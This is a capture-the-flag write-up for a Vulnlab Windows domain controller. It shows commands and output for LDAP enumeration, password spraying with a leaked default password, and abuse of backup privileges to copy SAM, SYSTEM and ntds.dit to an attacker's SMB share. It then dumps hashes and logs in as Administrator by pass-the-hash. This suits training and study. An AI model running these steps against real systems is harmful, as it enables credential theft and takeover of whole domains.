Baby - wook413

#vulnlab #easy #activedirectory #windows # Information Gathering I began the machine with scanning all 65,535 ports using `nmap` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-30 01:33 UTC Nmap scan report for 10.10.119.152 Host is up (0.13s latency). Not shown: 65525 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3389/tcp open ms-wbt-server 49664/tcp open unknown 58372/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 43.94 seconds ``` Then I ran one more TCP scan against the found ports for more information ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sC -sV -p 53,135,139,389,445,593,636,3389,49664,58372 Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-30 01:36 UTC Nmap scan report for 10.10.119.152 Host is up (0.15s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2025-09-30T01:38:13+00:00; +1s from scanner time. | rdp-ntlm-info: | Target_Name: BABY | NetBIOS_Domain_Name: BABY | NetBIOS_Computer_Name: BABYDC | DNS_Domain_Name: baby.vl | DNS_Computer_Name: BabyDC.baby.vl | Product_Version: 10.0.20348 |_ System_Time: 2025-09-30T01:37:33+00:00 | ssl-cert: Subject: commonName=BabyDC.baby.vl | Not valid before: 2025-09-29T01:32:53 |_Not valid after: 2026-03-31T01:32:53 49664/tcp open msrpc Microsoft Windows RPC 58372/tcp open msrpc Microsoft Windows RPC Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-09-30T01:37:34 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 98.77 seconds ``` Lastly, a UDP scan against the top 10 ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-30 01:38 UTC Nmap scan report for 10.10.119.152 Host is up (0.14s latency). PORT STATE SERVICE 53/udp open domain 67/udp open|filtered dhcps 123/udp open ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 2.45 seconds ``` # Enumeration Before beginning enumeration, I mapped the IP address with all of the domain and NETBIOS names I found from the Nmap output. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo '10.10.119.152 baby babydc baby.vl babydc.baby.vl' | sudo tee -a /etc/hosts 10.10.119.152 baby babydc baby.vl babydc.baby.vl ``` ##### SMB 135 445 SMB null authentication is not allowed. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N -L //$IP Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.119.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nxc smb $IP -u '' -p '' SMB 10.10.119.152 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) SMB 10.10.119.152 445 BABYDC [+] baby.vl\: ┌──(kali㉿kali)-[~/Desktop] └─$ nxc smb $IP -u 'guest' -p '' SMB 10.10.119.152 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) SMB 10.10.119.152 445 BABYDC [-] baby.vl\guest: STATUS_ACCOUNT_DISABLED ``` ##### ldap 389 636 Since the port 636 is open, we can try `ldapsearch` and see if we can get any useful info. The output appeared the query returned all of the objects in the domain. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ldapsearch -x -H ldap://$IP -b "dc=baby,dc=vl" # extended LDIF # # LDAPv3 # base <dc=baby,dc=vl> with scope subtree # filter: (objectclass=*) # requesting: ALL # # baby.vl dn: DC=baby,DC=vl # Administrator, Users, baby.vl dn: CN=Administrator,CN=Users,DC=baby,DC=vl # Guest, Users, baby.vl dn: CN=Guest,CN=Users,DC=baby,DC=vl objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Guest description: Built-in account for guest access to the computer/domain ... ... ``` As I scrolling down through the objects, I found a user that has description revealing his/her initial password. `BabyStart123!` This user's AccountName is `Teresa.Bell` ![[Pasted image 20250929205103.png]] However, the set of credentials appeared to be invalid. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nxc rdp $IP -u 'Teresa.Bell' -p 'BabyStart123!' RDP 10.10.119.152 3389 BABYDC [*] Windows 10 or Windows Server 2016 Build 20348 (name:BABYDC) (domain:baby.vl) (nla:True) RDP 10.10.119.152 3389 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! (STATUS_LOGON_FAILURE) ┌──(kali㉿kali)-[~/Desktop] └─$ nxc smb $IP -u 'Teresa.Bell' -p 'BabyStart123!' SMB 10.10.119.152 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) SMB 10.10.119.152 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE ``` We know `ldapsearch` works. Let's get a list of users and perform a password spray. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ldapsearch -x -H ldap://$IP -b "dc=baby,dc=vl" "user" | grep CN= dn: CN=Administrator,CN=Users,DC=baby,DC=vl dn: CN=Guest,CN=Users,DC=baby,DC=vl dn: CN=krbtgt,CN=Users,DC=baby,DC=vl dn: CN=Domain Computers,CN=Users,DC=baby,DC=vl dn: CN=Domain Controllers,CN=Users,DC=baby,DC=vl dn: CN=Schema Admins,CN=Users,DC=baby,DC=vl dn: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl dn: CN=Cert Publishers,CN=Users,DC=baby,DC=vl dn: CN=Domain Admins,CN=Users,DC=baby,DC=vl dn: CN=Domain Users,CN=Users,DC=baby,DC=vl dn: CN=Domain Guests,CN=Users,DC=baby,DC=vl dn: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl dn: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl dn: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl dn: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl dn: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl dn: CN=Protected Users,CN=Users,DC=baby,DC=vl dn: CN=Key Admins,CN=Users,DC=baby,DC=vl dn: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl dn: CN=DnsAdmins,CN=Users,DC=baby,DC=vl dn: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl dn: CN=dev,CN=Users,DC=baby,DC=vl dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl dn: CN=Hugh George,OU=dev,DC=baby,DC=vl dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl dn: CN=Ian Walker,OU=dev,DC=baby,DC=vl dn: CN=it,CN=Users,DC=baby,DC=vl dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl ref: ldap://baby.vl/CN=Configuration,DC=baby,DC=vl ``` `users2.txt` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat users2.txt Administrator Guest krbtgt Domain Computers Domain Controllers Schema Admins Enterprise Admins Cert Publishers Domain Admins Domain Users Domain Guests Group Policy Creator Owners RAS and IAS Servers Allowed RODC Password Replication Group Denied RODC Password Replication Group Read-only Domain Controllers Enterprise Read-only Domain Controllers Cloneable Domain Controllers Protected Users Key Admins Enterprise Key Admins DnsAdmins DnsUpdateProxy dev Jacqueline.Barnett Ashley.Webb Hugh.George Leonard.Dyer Ian.Walker it Connor.Wilkinson Joseph.Hughes Kerry.Wilson Teresa.Bell Caroline.Robinson ``` We got a hit on `Caroline.Robinson` ```bash SMB 10.10.119.152 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE ``` ##### RDP 3389 `nxc` verifies the credentials work against RDP. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nxc rdp $IP -u 'caroline.robinson' -p 'BabyStart123!' RDP 10.10.119.152 3389 BABYDC [*] Windows 10 or Windows Server 2016 Build 20348 (name:BABYDC) (domain:baby.vl) (nla:True) RDP 10.10.119.152 3389 BABYDC [-] baby.vl\caroline.robinson:BabyStart123! (STATUS_PASSWORD_MUST_CHANGE) ``` `xfreerdp3` fails. Maybe I need to change the password first as it keeps telling me? ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ xfreerdp3 /v:$IP /u:'Caroline.Robinson' /p:'BabyStart123!' /dynamic-resolution [02:38:22:024] [669747:000a384e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found [02:38:22:024] [669747:000a384e] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found [02:38:22:575] [669747:000a384e] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0 [02:38:22:576] [669747:000a384e] [WARN][com.freerdp.crypto] - [verify_cb]: CN = BabyDC.baby.vl [02:38:22:577] [669747:000a384e] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160]) [02:38:22:577] [669747:000a384e] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160]) [02:38:22:824] [669747:000a384e] [ERROR][com.freerdp.core] - [nla_recv_pdu]: ERRCONNECT_PASSWORD_MUST_CHANGE [0x00020013] [02:38:22:824] [669747:000a384e] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x56533b9b7e80]: CONNECTION_STATE_NLA - nla_recv_pdu() fail [02:38:22:825] [669747:000a384e] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x56533b9b7e80]: CONNECTION_STATE_NLA status STATE_RUN_FAILED [-1] [02:38:22:825] [669747:000a384e] [ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1] ``` I changed the user's password using `smbpasswd`. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbpasswd -U baby.vl/'caroline.robinson' -r $IP Old SMB password: New SMB password: Retype new SMB password: Password changed for user caroline.robinson ``` # Shell as `caroline.robinson` `xfreerdp` kept failing, so I tried logging in with `evil-wirm` and it worked. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ evil-winrm -i $IP -u 'caroline.robinson' -p 'Hello123!' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami baby\caroline.robinson ``` Found `user.txt` in `C:\Users\Caroline.Robinson\Desktop`. ```bash *Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> dir Directory: C:\Users\Caroline.Robinson\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website -a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website -a---- 11/21/2021 3:24 PM 36 user.txt *Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> type user.txt VL{b2c6150b85125d32f4b253df9540d898} ``` # Privilege Escalation - Shell as `SYSTEM` `whoami /priv` reveals our current user has `SeBackUpPrivilege` and `SeRestorePrivilege` which are likely to provide privilege escalation vectors. ```bash *Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled ``` Save `SAM` and `SYSTEM` registry hives locally ```powershell *Evil-WinRM* PS C:\Temp> reg save hklm\sam C:\Temp\sam.hive The operation completed successfully. *Evil-WinRM* PS C:\Temp> reg save hklm\system C:\Temp\system.hive The operation completed successfully. ``` Run `impacket-smbserver` in attacker's kali machine ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-smbserver share ~/Desktop -smb2support -username test -password test Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed ``` Connect to attacker's SMB server from the target host ```powershell *Evil-WinRM* PS C:\Temp> net use \\10.8.7.140\share /user:test test The command completed successfully. ``` Transfer the downloaded registry hives from the target host to attacker's kali ```powershell *Evil-WinRM* PS C:\Temp> copy C:\Temp\sam.hive \\10.8.7.140\share\ *Evil-WinRM* PS C:\Temp> copy C:\Temp\system.hive \\10.8.7.140\share\ ``` Or since we are currently logged in via `evil-winrm`, we can simply download the files ```bash *Evil-WinRM* PS C:\Temp> download sam.hive Info: Downloading C:\Temp\sam.hive to sam.hive Info: Download successful! ``` After successfully transferred those files to the attacker's kali, we can dump the hashes using `impacket-secretsdump` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Cleaning up... ``` However, connecting to the target machine using the hash fails for both `evil-winrm` and `impacket-psexec` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ evil-winrm -i $IP -u 'Administrator' -H '8d992faed38128ae85e95fa35868bb43' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1 ``` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-psexec Administrator@$IP -hashes 'aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43' Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information. ``` `Xct` explains it's because the hash is the local administrator's hash which is not usable on a domain controller for logging in. Instead, we have to get the hash of the account in the domain. To do this, we have to grab `ntds.dit` as well. Write the following content inside a file `script.txt` ```bash *Evil-WinRM* PS C:\Temp> type script.txt set metadata C:\Windows\Temp\meta.cabX set context clientaccessibleX set context persistentX begin backupX add volume C: alias cdriveX createX expose %cdrive% E:X end backupX ``` Run `diskshadow` ```bash *Evil-WinRM* PS C:\Temp> diskshadow /s script.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: BABYDC, 9/30/2025 3:30:39 AM -> set metadata C:\Windows\Temp\meta.cab -> set context clientaccessible -> set context persistent -> begin backup -> add volume C: alias cdrive -> create Alias cdrive for shadow ID {70263b0c-b3aa-4ba4-b922-8420e7f23e7a} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {d0568f7d-f687-4ec0-b566-303b830372be} set as environment variable. Querying all shadow copies with the shadow copy set ID {d0568f7d-f687-4ec0-b566-303b830372be} * Shadow copy ID = {70263b0c-b3aa-4ba4-b922-8420e7f23e7a} %cdrive% - Shadow copy set: {d0568f7d-f687-4ec0-b566-303b830372be} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\] - Creation time: 9/30/2025 3:30:55 AM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: BabyDC.baby.vl - Service machine: BabyDC.baby.vl - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent Differential Number of shadow copies listed: 1 -> expose %cdrive% E: -> %cdrive% = {70263b0c-b3aa-4ba4-b922-8420e7f23e7a} The shadow copy was successfully exposed as E:\. -> end backup -> ``` Copy `ntds` to C ```bash *Evil-WinRM* PS C:\Temp> robocopy /b E:\Windows\ntds . ntds.dit ------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows ------------------------------------------------------------------------------- Started : Tuesday, September 30, 2025 3:31:59 AM Source : E:\Windows\ntds\ Dest : C:\Temp\ Files : ntds.dit Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30 ------------------------------------------------------------------------------ 1 E:\Windows\ntds\ New File 16.0 m ntds.dit ``` Now we have `ntds.dit` locally ```bash *Evil-WinRM* PS C:\Temp> ls Directory: C:\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/30/2025 3:30 AM 16777216 ntds.dit -a---- 9/30/2025 2:51 AM 49152 sam.hive -a---- 9/30/2025 3:30 AM 175 script.txt -a---- 9/30/2025 2:51 AM 16859136 system.hive ``` Transfer `ntds.dit` file from the target windows machine to local Kali ```powershell *Evil-WinRM* PS C:\Temp> net use \\10.8.7.140\share /user:test test *Evil-WinRM* PS C:\Temp> copy C:\Temp\ntds.dit \\10.8.7.140\share\ ``` Dump all the hashes ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:24b84dacaef7987e1fc06d38238130b8::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884::: baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34ae d8::: baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89::: baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1::: ... ... ``` Log in as `Administrator` ```powershell ┌──(kali㉿kali)-[~/Desktop] └─$ evil-winrm -i $IP -u 'Administrator' -H 'ee4457ae59f1e3fbd764e33d9cef123d' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami baby\administrator ``` Found `root.txt` ```powershell *Evil-WinRM* PS C:\Users\Administrator\Desktop> ls Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 11/21/2021 3:22 PM 36 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt VL{9000cab96bcf62e99073ff5f6653ce90} ```